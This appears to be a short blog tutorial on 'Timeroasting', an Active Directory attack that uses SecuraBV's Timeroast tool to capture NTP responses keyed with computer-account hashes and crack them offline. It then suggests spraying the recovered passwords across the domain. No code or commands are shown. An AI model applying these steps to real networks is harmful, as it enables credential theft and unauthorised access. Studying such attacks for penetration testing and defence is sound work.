Intro to Timeroasting - A New Attack Against the Network Time Protocol (NTP)

Today we will be shortly covering a tool called "Timeroast" by SecuraBV which takes advantage of the Network Time Protocol (NTP) in Active Directory environments. This protocol is utilized when a system needs to synchronize its clock to the domain controller and has since been secured due to MiTM attacks in the past against the protocol and systems clock's. This more 'secure' feature is exactly what we'll be taking advantage of with this tool.  Now although timeroasting is what you would consider a low probability attack, it is also a low effort attack which can be run in the background as further testing is continued. Let's go ahead and cover some more of the features and details of the tool and protocol.

 

In short, the secured version of NTP protocol includes the RID of the computer account in the NTP request and the server adds a response that uses the NTLM hash of the requesting computer account password and uses that as a key for encrypted protocol communication. Using Timeroast we are able to capture these hashes as their being communicated and potentially crack them offline with a Kali machine NOT directly connected to the domain! Also the tool also comes with a password cracker written in Python which is very handy in our case as these hash types are not supported by Hashcat and there are hashing issues with John as well.

Just quickly going into one downside to this attack is that the actual computer names are not included, only the RIDs assigned to them when the NTP hashes are captured. While it is possible to match RIDs to computer names we won't be covering that in this post (some quick ideas would be Kerberoasting as a potential way to gather usernames of the domain). Below you can see that hashes are dumped but no usernames are included, just the corresponding RID #s.

Gathering NTP hashes with timeroast.py

Also certain systems were currently not requesting time synchronization with the domain controller at the time of running the tool, so each time you run timeroast.py you seem to gather some already captured hashes and some new hashes. You could continue to run this tool until you feel like you have exhausted the list of users, or possibly you are already aware of the # of existing users in the domain and could continue to capture hashes until you reached that amount matching the # of users.

Managing to crack a hash with timecrack.py

With one of the passwords actually being recovered here using a simple wordlist with the included tool timecrack.py we can see that this does attack does indeed show some promise against gathering and cracking valid network credentials. Still not knowing the username this password matches to, we could potentially password spray these found credentials across the domain, or go another route and try and match it with an already known username we may be more sure it belongs to. The choice is up to your personal skillset and creativity on how exactly you could use these credentials to gain further access.

Happy hacking! :)
 

:LINKS:

https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf

https://github.com/SecuraBV/Timeroast